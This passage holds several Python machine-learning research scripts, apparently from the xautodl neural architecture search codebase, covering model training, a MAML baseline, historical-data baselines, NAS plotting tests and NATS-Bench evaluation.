"--checkpoint", type=str, help="Choose between Cifar10/100 and ImageNet."
)
args = parser.parse_args()
assert torch.cuda.is_available(), "torch.cuda is not available"
main(args)
```
#### File: exps/basic/xmain.py
```python
import os, sys, time, torch, random, argparse
from copy import deepcopy
from pathlib import Path
lib_dir = (Path(__file__).parent / ".." / "..").resolve()
print("LIB-DIR: {:}".format(lib_dir))
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from xautodl import xmisc
def main(args):
train_data = xmisc.nested_call_by_yaml(args.train_data_config, args.data_path)
valid_data = xmisc.nested_call_by_yaml(args.valid_data_config, args.data_path)
logger = xmisc.Logger(args.save_dir, prefix="seed-{:}-".format(args.rand_seed))
logger.log("Create the logger: {:}".format(logger))
logger.log("Arguments : -------------------------------")
for name, value in args._get_kwargs():
logger.log("{:16} : {:}".format(name, value))
logger.log("Python Version : {:}".format(sys.version.replace("\n", " ")))
logger.log("PyTorch Version : {:}".format(torch.__version__))
logger.log("cuDNN Version : {:}".format(torch.backends.cudnn.version()))
logger.log("CUDA available : {:}".format(torch.cuda.is_available()))
logger.log("CUDA GPU numbers : {:}".format(torch.cuda.device_count()))
logger.log(
"CUDA_VISIBLE_DEVICES : {:}".format(
os.environ["CUDA_VISIBLE_DEVICES"]
if "CUDA_VISIBLE_DEVICES" in os.environ
else "None"
)
)
logger.log("The training data is:\n{:}".format(train_data))
logger.log("The validation data is:\n{:}".format(valid_data))
model = xmisc.nested_call_by_yaml(args.model_config)
logger.log("The model is:\n{:}".format(model))
logger.log("The model size is {:.4f} M".format(xmisc.count_parameters(model)))
train_loader = torch.utils.data.DataLoader(
train_data,
batch_sampler=xmisc.BatchSampler(train_data, args.batch_size, args.steps),
num_workers=args.workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=args.batch_size,
shuffle=False,
num_workers=args.workers,
pin_memory=True,
drop_last=False,
)
iters_per_epoch = len(train_data) // args.batch_size
logger.log("The training loader: {:}".format(train_loader))
logger.log("The validation loader: {:}".format(valid_loader))
optimizer = xmisc.nested_call_by_yaml(
args.optim_config,
model.parameters(),
lr=args.lr,
weight_decay=args.weight_decay,
)
objective = xmisc.nested_call_by_yaml(args.loss_config)
metric = xmisc.nested_call_by_yaml(args.metric_config)
logger.log("The optimizer is:\n{:}".format(optimizer))
logger.log("The objective is {:}".format(objective))
logger.log("The metric is {:}".format(metric))
logger.log(
"The iters_per_epoch = {:}, estimated epochs = {:}".format(
iters_per_epoch, args.steps // iters_per_epoch
)
)
model, objective = torch.nn.DataParallel(model).cuda(), objective.cuda()
scheduler = xmisc.LRMultiplier(
optimizer, xmisc.get_scheduler(args.scheduler, args.lr), args.steps
)
start_time, iter_time = time.time(), xmisc.AverageMeter()
for xiter, data in enumerate(train_loader):
need_time = "Time Left: {:}".format(
xmisc.time_utils.convert_secs2time(
iter_time.avg * (len(train_loader) - xiter), True
)
)
iter_str = "{:6d}/{:06d}".format(xiter, len(train_loader))
inputs, targets = data
targets = targets.cuda(non_blocking=True)
model.train()
optimizer.zero_grad()
outputs = model(inputs)
loss = objective(outputs, targets)
loss.backward()
optimizer.step()
scheduler.step()
if xiter % iters_per_epoch == 0:
logger.log("TRAIN [{:}] loss = {:.6f}".format(iter_str, loss.item()))
# measure elapsed time
iter_time.update(time.time() - start_time)
start_time = time.time()
logger.log("-" * 200 + "\n")
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Train a classification model with a loss function.",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
parser.add_argument(
"--save_dir", type=str, help="Folder to save checkpoints and log."
)
parser.add_argument("--resume", type=str, help="Resume path.")
parser.add_argument("--init_model", type=str, help="The initialization model path.")
parser.add_argument("--model_config", type=str, help="The path to the model config")
parser.add_argument("--optim_config", type=str, help="The optimizer config file.")
parser.add_argument("--loss_config", type=str, help="The loss config file.")
parser.add_argument("--metric_config", type=str, help="The metric config file.")
parser.add_argument(
"--train_data_config", type=str, help="The training dataset config path."
)
parser.add_argument(
"--valid_data_config", type=str, help="The validation dataset config path."
)
parser.add_argument("--data_path", type=str, help="The path to the dataset.")
# Optimization options
parser.add_argument("--lr", type=float, help="The learning rate")
parser.add_argument("--weight_decay", type=float, help="The weight decay")
parser.add_argument("--scheduler", type=str, help="The scheduler indicator.")
parser.add_argument("--steps", type=int, help="The total number of steps.")
parser.add_argument("--batch_size", type=int, default=256, help="The batch size.")
parser.add_argument("--workers", type=int, default=4, help="The number of workers")
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = random.randint(1, 100000)
if args.save_dir is None:
raise ValueError("The save-path argument can not be None")
main(args)
```
#### File: GeMOSA/baselines/maml-ft.py
```python
import sys, time, copy, torch, random, argparse
from tqdm import tqdm
from copy import deepcopy
from pathlib import Path
lib_dir = (Path(__file__).parent / ".." / ".." / "..").resolve()
print(lib_dir)
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from xautodl.procedures import (
prepare_seed,
prepare_logger,
save_checkpoint,
copy_checkpoint,
)
from xautodl.log_utils import time_string
from xautodl.log_utils import AverageMeter, convert_secs2time
from xautodl.procedures.metric_utils import SaveMetric, MSEMetric, Top1AccMetric
from xautodl.datasets.synthetic_core import get_synthetic_env
from xautodl.models.xcore import get_model
from xautodl.xlayers import super_core
class MAML:
"""A LFNA meta-model that uses the MLP as delta-net."""
def __init__(
self, network, criterion, epochs, meta_lr, inner_lr=0.01, inner_step=1
):
self.criterion = criterion
self.network = network
self.meta_optimizer = torch.optim.Adam(
self.network.parameters(), lr=meta_lr, amsgrad=True
)
self.inner_lr = inner_lr
self.inner_step = inner_step
self._best_info = dict(state_dict=None, iepoch=None, score=None)
print("There are {:} weights.".format(self.network.get_w_container().numel()))
def adapt(self, x, y):
# create a container for the future timestamp
container = self.network.get_w_container()
for k in range(0, self.inner_step):
y_hat = self.network.forward_with_container(x, container)
loss = self.criterion(y_hat, y)
grads = torch.autograd.grad(loss, container.parameters())
container = container.additive([-self.inner_lr * grad for grad in grads])
return container
def predict(self, x, container=None):
if container is not None:
y_hat = self.network.forward_with_container(x, container)
else:
y_hat = self.network(x)
return y_hat
def step(self):
torch.nn.utils.clip_grad_norm_(self.network.parameters(), 1.0)
self.meta_optimizer.step()
def zero_grad(self):
self.meta_optimizer.zero_grad()
def load_state_dict(self, state_dict):
self.criterion.load_state_dict(state_dict["criterion"])
self.network.load_state_dict(state_dict["network"])
self.meta_optimizer.load_state_dict(state_dict["meta_optimizer"])
def state_dict(self):
state_dict = dict()
state_dict["criterion"] = self.criterion.state_dict()
state_dict["network"] = self.network.state_dict()
state_dict["meta_optimizer"] = self.meta_optimizer.state_dict()
return state_dict
def save_best(self, score):
success, best_score = self.network.save_best(score)
return success, best_score
def load_best(self):
self.network.load_best()
def main(args):
prepare_seed(args.rand_seed)
logger = prepare_logger(args)
train_env = get_synthetic_env(mode="train", version=args.env_version)
valid_env = get_synthetic_env(mode="valid", version=args.env_version)
trainval_env = get_synthetic_env(mode="trainval", version=args.env_version)
test_env = get_synthetic_env(mode="test", version=args.env_version)
all_env = get_synthetic_env(mode=None, version=args.env_version)
logger.log("The training enviornment: {:}".format(train_env))
logger.log("The validation enviornment: {:}".format(valid_env))
logger.log("The trainval enviornment: {:}".format(trainval_env))
logger.log("The total enviornment: {:}".format(all_env))
logger.log("The test enviornment: {:}".format(test_env))
model_kwargs = dict(
config=dict(model_type="norm_mlp"),
input_dim=all_env.meta_info["input_dim"],
output_dim=all_env.meta_info["output_dim"],
hidden_dims=[args.hidden_dim] * 2,
act_cls="relu",
norm_cls="layer_norm_1d",
)
model = get_model(**model_kwargs)
model = model.to(args.device)
if all_env.meta_info["task"] == "regression":
criterion = torch.nn.MSELoss()
metric_cls = MSEMetric
elif all_env.meta_info["task"] == "classification":
criterion = torch.nn.CrossEntropyLoss()
metric_cls = Top1AccMetric
else:
raise ValueError(
"This task ({:}) is not supported.".format(all_env.meta_info["task"])
)
maml = MAML(
model, criterion, args.epochs, args.meta_lr, args.inner_lr, args.inner_step
)
# meta-training
last_success_epoch = 0
per_epoch_time, start_time = AverageMeter(), time.time()
for iepoch in range(args.epochs):
need_time = "Time Left: {:}".format(
convert_secs2time(per_epoch_time.avg * (args.epochs - iepoch), True)
)
head_str = (
"[{:}] [{:04d}/{:04d}] ".format(time_string(), iepoch, args.epochs)
+ need_time
)
maml.zero_grad()
meta_losses = []
for ibatch in range(args.meta_batch):
future_idx = random.randint(0, len(trainval_env) - 1)
future_t, (future_x, future_y) = trainval_env[future_idx]
# -->>
seq_times = trainval_env.get_seq_times(future_idx, args.seq_length)
_, (allxs, allys) = trainval_env.seq_call(seq_times)
allxs, allys = allxs.view(-1, allxs.shape[-1]), allys.view(-1, 1)
if trainval_env.meta_info["task"] == "classification":
allys = allys.view(-1)
historical_x, historical_y = allxs.to(args.device), allys.to(args.device)
future_container = maml.adapt(historical_x, historical_y)
future_x, future_y = future_x.to(args.device), future_y.to(args.device)
future_y_hat = maml.predict(future_x, future_container)
future_loss = maml.criterion(future_y_hat, future_y)
meta_losses.append(future_loss)
meta_loss = torch.stack(meta_losses).mean()
meta_loss.backward()
maml.step()
logger.log(head_str + " meta-loss: {:.4f}".format(meta_loss.item()))
success, best_score = maml.save_best(-meta_loss.item())
if success:
logger.log("Achieve the best with best_score = {:.3f}".format(best_score))
save_checkpoint(maml.state_dict(), logger.path("model"), logger)
last_success_epoch = iepoch
if iepoch - last_success_epoch >= args.early_stop_thresh:
logger.log("Early stop at {:}".format(iepoch))
break
per_epoch_time.update(time.time() - start_time)
start_time = time.time()
# meta-test
maml.load_best()
def finetune(index):
seq_times = test_env.get_seq_times(index, args.seq_length)
_, (allxs, allys) = test_env.seq_call(seq_times)
allxs, allys = allxs.view(-1, allxs.shape[-1]), allys.view(-1, 1)
if test_env.meta_info["task"] == "classification":
allys = allys.view(-1)
historical_x, historical_y = allxs.to(args.device), allys.to(args.device)
future_container = maml.adapt(historical_x, historical_y)
historical_y_hat = maml.predict(historical_x, future_container)
train_metric = metric_cls(True)
# model.analyze_weights()
with torch.no_grad():
train_metric(historical_y_hat, historical_y)
train_results = train_metric.get_info()
return train_results, future_container
metric = metric_cls(True)
per_timestamp_time, start_time = AverageMeter(), time.time()
for idx, (future_time, (future_x, future_y)) in enumerate(test_env):
need_time = "Time Left: {:}".format(
convert_secs2time(per_timestamp_time.avg * (len(test_env) - idx), True)
)
logger.log(
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}]".format(idx, len(test_env))
+ " "
+ need_time
)
# build optimizer
train_results, future_container = finetune(idx)
future_x, future_y = future_x.to(args.device), future_y.to(args.device)
future_y_hat = maml.predict(future_x, future_container)
future_loss = criterion(future_y_hat, future_y)
metric(future_y_hat, future_y)
log_str = (
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}]".format(idx, len(test_env))
+ " train-score: {:.5f}, eval-score: {:.5f}".format(
train_results["score"], metric.get_info()["score"]
)
)
logger.log(log_str)
logger.log("")
per_timestamp_time.update(time.time() - start_time)
start_time = time.time()
logger.log("-" * 200 + "\n")
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("Use the maml.")
parser.add_argument(
"--save_dir",
type=str,
default="./outputs/GeMOSA-synthetic/use-maml-ft",
help="The checkpoint directory.",
)
parser.add_argument(
"--env_version",
type=str,
required=True,
help="The synthetic enviornment version.",
)
parser.add_argument(
"--hidden_dim",
type=int,
default=16,
help="The hidden dimension.",
)
parser.add_argument(
"--meta_lr",
type=float,
default=0.02,
help="The learning rate for the MAML optimizer (default is Adam)",
)
parser.add_argument(
"--inner_lr",
type=float,
default=0.005,
help="The learning rate for the inner optimization",
)
parser.add_argument(
"--inner_step", type=int, default=1, help="The inner loop steps for MAML."
)
parser.add_argument(
"--seq_length", type=int, default=20, help="The sequence length."
)
parser.add_argument(
"--meta_batch",
type=int,
default=256,
help="The batch size for the meta-model",
)
parser.add_argument(
"--epochs",
type=int,
default=2000,
help="The total number of epochs.",
)
parser.add_argument(
"--early_stop_thresh",
type=int,
default=50,
help="The maximum epochs for early stop.",
)
parser.add_argument(
"--device",
type=str,
default="cpu",
help="",
)
parser.add_argument(
"--workers",
type=int,
default=4,
help="The number of data loading workers (default: 4)",
)
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = random.randint(1, 100000)
assert args.save_dir is not None, "The save dir argument can not be None"
args.save_dir = "{:}-s{:}-mlr{:}-d{:}-e{:}-env{:}".format(
args.save_dir,
args.inner_step,
args.meta_lr,
args.hidden_dim,
args.epochs,
args.env_version,
)
main(args)
```
#### File: experimental/GeMOSA/basic-his.py
```python
import sys, time, copy, torch, random, argparse
from tqdm import tqdm
from copy import deepcopy
from xautodl.procedures import (
prepare_seed,
prepare_logger,
save_checkpoint,
copy_checkpoint,
)
from xautodl.log_utils import time_string
from xautodl.log_utils import AverageMeter, convert_secs2time
from xautodl.utils import split_str2indexes
from xautodl.procedures.advanced_main import basic_train_fn, basic_eval_fn
from xautodl.procedures.metric_utils import SaveMetric, MSEMetric, ComposeMetric
from xautodl.datasets.synthetic_core import get_synthetic_env
from xautodl.models.xcore import get_model
from lfna_utils import lfna_setup
def subsample(historical_x, historical_y, maxn=10000):
total = historical_x.size(0)
if total <= maxn:
return historical_x, historical_y
else:
indexes = torch.randint(low=0, high=total, size=[maxn])
return historical_x[indexes], historical_y[indexes]
def main(args):
logger, env_info, model_kwargs = lfna_setup(args)
# check indexes to be evaluated
to_evaluate_indexes = split_str2indexes(args.srange, env_info["total"], None)
logger.log(
"Evaluate {:}, which has {:} timestamps in total.".format(
args.srange, len(to_evaluate_indexes)
)
)
w_container_per_epoch = dict()
per_timestamp_time, start_time = AverageMeter(), time.time()
for i, idx in enumerate(to_evaluate_indexes):
need_time = "Time Left: {:}".format(
convert_secs2time(
per_timestamp_time.avg * (len(to_evaluate_indexes) - i), True
)
)
logger.log(
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}][{:04d}]".format(i, len(to_evaluate_indexes), idx)
+ " "
+ need_time
)
# train the same data
assert idx != 0
historical_x, historical_y = [], []
for past_i in range(idx):
historical_x.append(env_info["{:}-x".format(past_i)])
historical_y.append(env_info["{:}-y".format(past_i)])
historical_x, historical_y = torch.cat(historical_x), torch.cat(historical_y)
historical_x, historical_y = subsample(historical_x, historical_y)
# build model
model = get_model(dict(model_type="simple_mlp"), **model_kwargs)
# build optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=args.init_lr, amsgrad=True)
criterion = torch.nn.MSELoss()
lr_scheduler = torch.optim.lr_scheduler.MultiStepLR(
optimizer,
milestones=[
int(args.epochs * 0.25),
int(args.epochs * 0.5),
int(args.epochs * 0.75),
],
gamma=0.3,
)
train_metric = MSEMetric()
best_loss, best_param = None, None
for _iepoch in range(args.epochs):
preds = model(historical_x)
optimizer.zero_grad()
loss = criterion(preds, historical_y)
loss.backward()
optimizer.step()
lr_scheduler.step()
# save best
if best_loss is None or best_loss > loss.item():
best_loss = loss.item()
best_param = copy.deepcopy(model.state_dict())
model.load_state_dict(best_param)
with torch.no_grad():
train_metric(preds, historical_y)
train_results = train_metric.get_info()
metric = ComposeMetric(MSEMetric(), SaveMetric())
eval_dataset = torch.utils.data.TensorDataset(
env_info["{:}-x".format(idx)], env_info["{:}-y".format(idx)]
)
eval_loader = torch.utils.data.DataLoader(
eval_dataset, batch_size=args.batch_size, shuffle=False, num_workers=0
)
results = basic_eval_fn(eval_loader, model, metric, logger)
log_str = (
"[{:}]".format(time_string())
+ " [{:04d}/{:04d}]".format(idx, env_info["total"])
+ " train-mse: {:.5f}, eval-mse: {:.5f}".format(
train_results["mse"], results["mse"]
)
)
logger.log(log_str)
save_path = logger.path(None) / "{:04d}-{:04d}.pth".format(
idx, env_info["total"]
)
w_container_per_epoch[idx] = model.get_w_container().no_grad_clone()
save_checkpoint(
{
"model_state_dict": model.state_dict(),
"model": model,
"index": idx,
"timestamp": env_info["{:}-timestamp".format(idx)],
},
save_path,
logger,
)
logger.log("")
per_timestamp_time.update(time.time() - start_time)
start_time = time.time()
save_checkpoint(
{"w_container_per_epoch": w_container_per_epoch},
logger.path(None) / "final-ckp.pth",
logger,
)
logger.log("-" * 200 + "\n")
logger.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser("Use all the past data to train.")
parser.add_argument(
"--save_dir",
type=str,
default="./outputs/lfna-synthetic/use-all-past-data",
help="The checkpoint directory.",
)
parser.add_argument(
"--env_version",
type=str,
required=True,
help="The synthetic enviornment version.",
)
parser.add_argument(
"--hidden_dim",
type=int,
required=True,
help="The hidden dimension.",
)
parser.add_argument(
"--init_lr",
type=float,
default=0.1,
help="The initial learning rate for the optimizer (default is Adam)",
)
parser.add_argument(
"--batch_size",
type=int,
default=512,
help="The batch size",
)
parser.add_argument(
"--epochs",
type=int,
default=1000,
help="The total number of epochs.",
)
parser.add_argument(
"--srange", type=str, required=True, help="The range of models to be evaluated"
)
parser.add_argument(
"--workers",
type=int,
default=4,
help="The number of data loading workers (default: 4)",
)
# Random Seed
parser.add_argument("--rand_seed", type=int, default=-1, help="manual seed")
args = parser.parse_args()
if args.rand_seed is None or args.rand_seed < 0:
args.rand_seed = random.randint(1, 100000)
assert args.save_dir is not None, "The save dir argument can not be None"
args.save_dir = "{:}-{:}-d{:}".format(
args.save_dir, args.env_version, args.hidden_dim
)
main(args)
```
#### File: exps/experimental/test-nas-plot.py
```python
import os, sys, random
from pathlib import Path
from copy import deepcopy
import torch
import numpy as np
from collections import OrderedDict
lib_dir = (Path(__file__).parent / ".." / ".." / "lib").resolve()
if str(lib_dir) not in sys.path:
sys.path.insert(0, str(lib_dir))
from nas_201_api import NASBench201API as API
def test_nas_api():
from nas_201_api import ArchResults
xdata = torch.load(
"/home/dxy/FOR-RELEASE/NAS-Projects/output/NAS-BENCH-201-4/simplifies/architectures/000157-FULL.pth"
)
for key in ["full", "less"]:
print("\n------------------------- {:} -------------------------".format(key))
archRes = ArchResults.create_from_state_dict(xdata[key])
print(archRes)
print(archRes.arch_idx_str())
print(archRes.get_dataset_names())
print(archRes.get_comput_costs("cifar10-valid"))
# get the metrics
print(archRes.get_metrics("cifar10-valid", "x-valid", None, False))
print(archRes.get_metrics("cifar10-valid", "x-valid", None, True))
print(archRes.query("cifar10-valid", 777))
OPS = ["skip-connect", "conv-1x1", "conv-3x3", "pool-3x3"]
COLORS = ["chartreuse", "cyan", "navyblue", "chocolate1"]
def plot(filename):
from graphviz import Digraph
g = Digraph(
format="png",
edge_attr=dict(fontsize="20", fontname="times"),
node_attr=dict(
style="filled",
shape="rect",
align="center",
fontsize="20",
height="0.5",
width="0.5",
penwidth="2",
fontname="times",
),
engine="dot",
)
g.body.extend(["rankdir=LR"])
steps = 5
for i in range(0, steps):
if i == 0:
g.node(str(i), fillcolor="darkseagreen2")
elif i + 1 == steps:
g.node(str(i), fillcolor="palegoldenrod")
else:
g.node(str(i), fillcolor="lightblue")
for i in range(1, steps):
for xin in range(i):
op_i = random.randint(0, len(OPS) - 1)
# g.edge(str(xin), str(i), label=OPS[op_i], fillcolor=COLORS[op_i])
g.edge(
str(xin),
str(i),
label=OPS[op_i],
color=COLORS[op_i],
fillcolor=COLORS[op_i],
)
# import pdb; pdb.set_trace()
g.render(filename, cleanup=True, view=False)
def test_auto_grad():
class Net(torch.nn.Module):
def __init__(self, iS):
super(Net, self).__init__()
self.layer = torch.nn.Linear(iS, 1)
def forward(self, inputs):
outputs = self.layer(inputs)
outputs = torch.exp(outputs)
return outputs.mean()
net = Net(10)
inputs = torch.rand(256, 10)
loss = net(inputs)
first_order_grads = torch.autograd.grad(
loss, net.parameters(), retain_graph=True, create_graph=True
)
first_order_grads = torch.cat([x.view(-1) for x in first_order_grads])
second_order_grads = []
for grads in first_order_grads:
s_grads = torch.autograd.grad(grads, net.parameters())
second_order_grads.append(s_grads)
def test_one_shot_model(ckpath, use_train):
from models import get_cell_based_tiny_net, get_search_spaces
from datasets import get_datasets, SearchDataset
from config_utils import load_config, dict2config
from utils.nas_utils import evaluate_one_shot
use_train = int(use_train) > 0
# ckpath = 'output/search-cell-nas-bench-201/DARTS-V1-cifar10/checkpoint/seed-11416-basic.pth'
# ckpath = 'output/search-cell-nas-bench-201/DARTS-V1-cifar10/checkpoint/seed-28640-basic.pth'
print("ckpath : {:}".format(ckpath))
ckp = torch.load(ckpath)
xargs = ckp["args"]
train_data, valid_data, xshape, class_num = get_datasets(
xargs.dataset, xargs.data_path, -1
)
# config = load_config(xargs.config_path, {'class_num': class_num, 'xshape': xshape}, None)
config = load_config(
"./configs/nas-benchmark/algos/DARTS.config",
{"class_num": class_num, "xshape": xshape},
None,
)
if xargs.dataset == "cifar10":
cifar_split = load_config("configs/nas-benchmark/cifar-split.txt", None, None)
xvalid_data = deepcopy(train_data)
xvalid_data.transform = valid_data.transform
valid_loader = torch.utils.data.DataLoader(
xvalid_data,
batch_size=2048,
sampler=torch.utils.data.sampler.SubsetRandomSampler(cifar_split.valid),
num_workers=12,
pin_memory=True,
)
else:
raise ValueError("invalid dataset : {:}".format(xargs.dataseet))
search_space = get_search_spaces("cell", xargs.search_space_name)
model_config = dict2config(
{
"name": "SETN",
"C": xargs.channel,
"N": xargs.num_cells,
"max_nodes": xargs.max_nodes,
"num_classes": class_num,
"space": search_space,
"affine": False,
"track_running_stats": True,
},
None,
)
search_model = get_cell_based_tiny_net(model_config)
search_model.load_state_dict(ckp["search_model"])
search_model = search_model.cuda()
api = API("/home/dxy/.torch/NAS-Bench-201-v1_0-e61699.pth")
archs, probs, accuracies = evaluate_one_shot(
search_model, valid_loader, api, use_train
)
if __name__ == "__main__":
# test_nas_api()
# for i in range(200): plot('{:04d}'.format(i))
# test_auto_grad()
test_one_shot_model(sys.argv[1], sys.argv[2])
```
#### File: exps/NATS-Bench/main-sss.py
```python
import os, sys, time, torch, argparse
from typing import List, Text, Dict, Any
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True
from copy import deepcopy
from pathlib import Path
from xautodl.config_utils import dict2config, load_config
from xautodl.procedures import bench_evaluate_for_seed
from xautodl.procedures import get_machine_info
from xautodl.datasets import get_datasets
from xautodl.log_utils import Logger, AverageMeter, time_string, convert_secs2time
from xautodl.utils import split_str2indexes
def evaluate_all_datasets(
channels: Text,
datasets: List[Text],
xpaths: List[Text],
splits: List[Text],
config_path: Text,
seed: int,
workers: int,
logger,
):
machine_info = get_machine_info()
all_infos = {"info": machine_info}
all_dataset_keys = []
# look all the dataset
for dataset, xpath, split in zip(datasets, xpaths, splits):
# the train and valid data
train_data, valid_data, xshape, class_num = get_datasets(dataset, xpath, -1)
# load the configuration
if dataset == "cifar10" or dataset == "cifar100":
split_info = load_config(
"configs/nas-benchmark/cifar-split.txt", None, None
)
elif dataset.startswith("ImageNet16"):
split_info = load_config(
"configs/nas-benchmark/{:}-split.txt".format(dataset), None, None
)
else:
raise ValueError("invalid dataset : {:}".format(dataset))
config = load_config(
config_path, dict(class_num=class_num, xshape=xshape), logger
)
# check whether use the splitted validation set
if bool(split):
assert dataset == "cifar10"
ValLoaders = {
"ori-test": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
shuffle=False,
num_workers=workers,
pin_memory=True,
)
}
assert len(train_data) == len(split_info.train) + len(
split_info.valid
), "invalid length : {:} vs {:} + {:}".format(
len(train_data), len(split_info.train), len(split_info.valid)
)
train_data_v2 = deepcopy(train_data)
train_data_v2.transform = valid_data.transform
valid_data = train_data_v2
# data loader
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(split_info.train),
num_workers=workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(split_info.valid),
num_workers=workers,
pin_memory=True,
)
ValLoaders["x-valid"] = valid_loader
else:
# data loader
train_loader = torch.utils.data.DataLoader(
train_data,
batch_size=config.batch_size,
shuffle=True,
num_workers=workers,
pin_memory=True,
)
valid_loader = torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
shuffle=False,
num_workers=workers,
pin_memory=True,
)
if dataset == "cifar10":
ValLoaders = {"ori-test": valid_loader}
elif dataset == "cifar100":
cifar100_splits = load_config(
"configs/nas-benchmark/cifar100-test-split.txt", None, None
)
ValLoaders = {
"ori-test": valid_loader,
"x-valid": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
cifar100_splits.xvalid
),
num_workers=workers,
pin_memory=True,
),
"x-test": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
cifar100_splits.xtest
),
num_workers=workers,
pin_memory=True,
),
}
elif dataset == "ImageNet16-120":
imagenet16_splits = load_config(
"configs/nas-benchmark/imagenet-16-120-test-split.txt", None, None
)
ValLoaders = {
"ori-test": valid_loader,
"x-valid": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
imagenet16_splits.xvalid
),
num_workers=workers,
pin_memory=True,
),
"x-test": torch.utils.data.DataLoader(
valid_data,
batch_size=config.batch_size,
sampler=torch.utils.data.sampler.SubsetRandomSampler(
imagenet16_splits.xtest
),
num_workers=workers,
pin_memory=True,
),
}
else:
raise ValueError("invalid dataset : {:}".format(dataset))
dataset_key = "{:}".format(dataset)
if bool(split):
dataset_key = dataset_key + "-valid"
logger.log(
"Evaluate ||||||| {:10s} ||||||| Train-Num={:}, Valid-Num={:}, Train-Loader-Num={:}, Valid-Loader-Num={:}, batch size={:}".format(
dataset_key,
len(train_data),
len(valid_data),
len(train_loader),
len(valid_loader),
config.batch_size,
)
)
logger.log(
"Evaluate ||||||| {:10s} ||||||| Config={:}".format(dataset_key, config)
)
for key, value in ValLoaders.items():
logger.log(
"Evaluate ---->>>> {:10s} with {:} batchs".format(key, len(value))
)
# arch-index= 9930, arch=|nor_conv_3x3~0|+|nor_conv_3x3~0|nor_conv_3x3~1|+|skip_connect~0|nor_conv_3x3~1|nor_conv_3x3~2|
# this genotype is the architecture with the highest accuracy on CIFAR-100 validation set
genotype = "|nor_conv_3x3~0|+|nor_conv_3x3~0|nor_conv_3x3~1|+|skip_connect~0|nor_conv_3x3~1|nor_conv_3x3~2|"
arch_config = dict2config(
dict(
name="infer.shape.tiny",
channels=channels,
genotype=genotype,
num_classes=class_num,
),
None,
)
results = bench_evaluate_for_seed(
arch_config, config, train_loader, ValLoaders, seed, logger
)
all_infos[dataset_key] = results
all_dataset_keys.append(dataset_key)
all_infos["all_dataset_keys"] = all_dataset_keys
return all_infos
def main(
save_dir: Path,
workers: int,
datasets: List[Text],
xpaths: List[Text],
splits: List[int],
seeds: List[int],
nets: List[str],
opt_config: Dict[Text, Any],
to_evaluate_indexes: tuple,
cover_mode: bool,
):
log_dir = save_dir / "logs"
log_dir.mkdir(parents=True, exist_ok=True)
logger = Logger(str(log_dir), os.getpid(), False)
logger.log("xargs : seeds = {:}".format(seeds))
logger.log("xargs : cover_mode = {:}".format(cover_mode))
logger.log("-" * 100)
logger.log(
"Start evaluating range =: {:06d} - {:06d}".format(
min(to_evaluate_indexes), max(to_evaluate_indexes)
)
+ "({:} in total) / {:06d} with cover-mode={:}".format(
len(to_evaluate_indexes), len(nets), cover_mode
)
)
for i, (dataset, xpath, split) in enumerate(zip(datasets, xpaths, splits)):
logger.log(
"--->>> Evaluate {:}/{:} : dataset={:9s}, path={:}, split={:}".format(
i, len(datasets), dataset, xpath, split
)
)
logger.log("--->>> optimization config : {:}".format(opt_config))
start_time, epoch_time = time.time(), AverageMeter()
for i, index in enumerate(to_evaluate_indexes):
channelstr = nets[index]
logger.log(
"\n{:} evaluate {:06d}/{:06d} ({:06d}/{:06d})-th arch [seeds={:}] {:}".format(
time_string(),
i,
len(to_evaluate_indexes),
index,
len(nets),
seeds,
"-" * 15,
)
)
logger.log("{:} {:} {:}".format("-" * 15, channelstr, "-" * 15))
# test this arch on different datasets with different seeds
has_continue = False
for seed in seeds:
to_save_name = save_dir / "arch-{:06d}-seed-{:04d}.pth".format(index, seed)
if to_save_name.exists():
if cover_mode:
logger.log(
"Find existing file : {:}, remove it before evaluation".format(
to_save_name
)
)
os.remove(str(to_save_name))
else:
logger.log(
"Find existing file : {:}, skip this evaluation".format(
to_save_name
)
)
has_continue = True
continue
results = evaluate_all_datasets(
channelstr, datasets, xpaths, splits, opt_config, seed, workers, logger
)
torch.save(results, to_save_name)
logger.log(
"\n{:} evaluate {:06d}/{:06d} ({:06d}/{:06d})-th arch [seeds={:}] ===>>> {:}".format(
time_string(),
i,
len(to_evaluate_indexes),
index,
len(nets),
seeds,
to_save_name,
)
)
# measure elapsed time
if not has_continue:
epoch_time.update(time.time() - start_time)
start_time = time.time()
need_time = "Time Left: {:}".format(
convert_secs2time(epoch_time.avg * (len(to_evaluate_indexes) - i - 1), True)
)
logger.log(
"This arch costs : {:}".format(convert_secs2time(epoch_time.val, True))
)
logger.log("{:}".format("*" * 100))
logger.log(
"{:} {:74s} {:}".format(
"*" * 10,
"{:06d}/{:06d} ({:06d}/{:06d})-th done, left {:}".format(
i, len(to_evaluate_indexes), index, len(nets), need_time
),
"*" * 10,
)
)
logger.log("{:}".format("*" * 100))
logger.close()
def traverse_net(candidates: List[int], N: int):
nets = [""]
for i in range(N):
new_nets = []
for net in nets:
for C in candidates:
